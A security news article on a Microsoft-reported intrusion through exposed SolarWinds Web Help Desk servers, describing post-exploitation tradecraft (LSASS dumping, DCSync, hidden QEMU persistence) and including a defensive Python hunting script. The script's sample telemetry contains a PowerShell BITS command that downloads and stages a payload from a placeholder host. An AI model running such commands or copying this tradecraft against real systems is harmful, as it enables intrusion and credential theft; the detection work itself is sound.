SolarWinds Web Help Desk Used for RCE in Multi-Phase Attacks on Exposed Servers

Microsoft has revealed that it observed a multi-stage intrusion in which threat actors used Internet-exposed instances of SolarWinds Web Help Desk (WHD) to gain initial access and then moved laterally across the organization's network to other high-value assets.
That said, the Microsoft Defender Security Research Team said it is not clear whether the attack exploited the recently disclosed flaws (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1) or a previously disclosed vulnerability (CVE-2025-26399).
"Since this attack took place in December 2025 on machines vulnerable to both old and new CVEs at the same time, we cannot reliably confirm the CVE used for initial access," the company said in a report published last week.
While CVE-2025-40536 is a security control vulnerability that could allow an unauthenticated attacker to access certain restricted functionality, CVE-2025-40551 and CVE-2025-26399 both refer to an untrusted data deserialization vulnerability that could lead to remote code execution.
Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch (FCEB) agencies were ordered to apply the fix by February 6, 2026.
In the attack discovered by Microsoft, successful exploitation of the exposed SolarWinds WHD instance allowed attackers to obtain unauthorized remote code execution and execute arbitrary commands within the context of the WHD application.

"Following successful exploitation, the vulnerable WHD instance service spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] in order to retrieve and stage payloads," noted researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini.
In the next step, the threat actors downloaded legitimate components of Zoho ManageEngine, a remote monitoring and management (RMM) solution, to enable continuous remote control of the infected system. The attackers then carried out a series of actions, including:
- Enumerating sensitive domain users and groups, including Domain Admins.
- Setting up persistence with reverse SSH and RDP access; the attackers also attempted to create a scheduled task that launches a QEMU virtual machine under the SYSTEM account at system startup, hiding their tracks inside the virtual environment while exposing SSH access through port forwarding.
- Using DLL sideloading on other hosts, abusing "wab.exe," a legitimate executable associated with the Windows Address Book, to load a malicious DLL ("sspicli.dll") that dumps the contents of LSASS memory for credential theft.
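The three post-exploitation behaviours listed above (a WHD service process spawning PowerShell that drives BITS, `wab.exe` loading `sspicli.dll` from outside the Windows system directories, and a scheduled task launching QEMU as SYSTEM) are all visible in ordinary endpoint telemetry. The following is an added detection example written for this article; it is not Microsoft's code or the report's own hunting query. The event field names, the `WebHelpDesk` install-path fragment, and the sample events are constructed assumptions, not observed artefacts from the intrusion.

```python
"""Hunt for the post-exploitation indicators described above over endpoint telemetry.

Events are plain dicts with an assumed schema (kind, host, parent, image, cmdline,
process, module, action, principal); adapt the field names to your EDR export.
"""
import ntpath

# Directories where a legitimately loaded sspicli.dll is expected to live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumed (hypothetical) fragment of the WHD service's install path.
WHD_PATH_MARKER = "webhelpdesk"


def _base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def _in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def check_event(ev):
    """Return the list of indicator names that one telemetry event matches."""
    hits = []
    kind = ev.get("kind")
    if kind == "process":
        parent = ev.get("parent", "").lower()
        image = _base(ev.get("image", ""))
        cmd = ev.get("cmdline", "").lower()
        # The WHD service (a Java/Tomcat process under its install directory)
        # should never spawn PowerShell, let alone one that drives BITS.
        if WHD_PATH_MARKER in parent and image == "powershell.exe" and "bits" in cmd:
            hits.append("whd_spawned_powershell_bits")
    elif kind == "image_load":
        proc = _base(ev.get("process", ""))
        module = ev.get("module", "")
        # sspicli.dll is a system DLL; wab.exe loading a copy from anywhere
        # else is the sideloading pattern from the report.
        if proc == "wab.exe" and _base(module) == "sspicli.dll" and not _in_system_dir(module):
            hits.append("wab_sspicli_sideload")
    elif kind == "scheduled_task":
        action = ev.get("action", "").lower()
        principal = ev.get("principal", "").upper()
        if "qemu" in action and principal in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
            hits.append("qemu_task_as_system")
    return hits


def hunt(events):
    """Run check_event over every event; return (host, indicator) pairs in order."""
    return [(ev.get("host", "?"), hit) for ev in events for hit in check_event(ev)]


# Constructed sample telemetry: three malicious events and two benign ones.
SAMPLE_EVENTS = [
    {"kind": "process", "host": "whd01",
     "parent": "C:\\Program Files\\SolarWinds\\WebHelpDesk\\bin\\java.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -c Start-BitsTransfer -Source http://example.invalid/stage "
                "-Destination C:\\ProgramData\\stage.bin"},
    {"kind": "image_load", "host": "fs01",
     "process": "C:\\Users\\Public\\wab.exe",
     "module": "C:\\Users\\Public\\sspicli.dll"},
    {"kind": "image_load", "host": "fs01",
     "process": "C:\\Program Files\\Windows Mail\\wab.exe",
     "module": "C:\\Windows\\System32\\sspicli.dll"},       # benign load
    {"kind": "scheduled_task", "host": "ws07",
     "action": "C:\\ProgramData\\qemu\\qemu-system-x86_64.exe -m 2048 -nographic",
     "principal": "SYSTEM"},
    {"kind": "process", "host": "ws07",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -c Get-Process"},            # benign admin use
]

if __name__ == "__main__":
    for host, indicator in hunt(SAMPLE_EVENTS):
        print(f"{host}: {indicator}")
```

Each check is deliberately narrow so it can run as a scheduled hunt with few false positives; the WHD-to-PowerShell rule in particular is worth keeping even after patching, since the report notes the service has no legitimate reason to spawn a shell.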
In at least one case, Microsoft said the threat actors carried out a DCSync attack, in which a Domain Controller (DC) is impersonated to request password hashes and other sensitive information from the Active Directory (AD) database.
To counter the threat, users are advised to keep WHD instances up to date, find and remove any unauthorized RMM tools, rotate service and management account credentials, and isolate compromised machines to contain the breach.
"This activity shows a common but high-impact pattern: a single exposed application can pave the way to full domain compromise when it is unpatched or insufficiently monitored," the Windows maker said.
"In these attacks, the attackers rely heavily on living-off-the-land techniques, legitimate management tools, and low-noise persistence methods. These tradecraft choices reinforce the importance of defense-in-depth, timely patching of Internet-facing services, and behavior-based detection across the identity, endpoint, and network layers."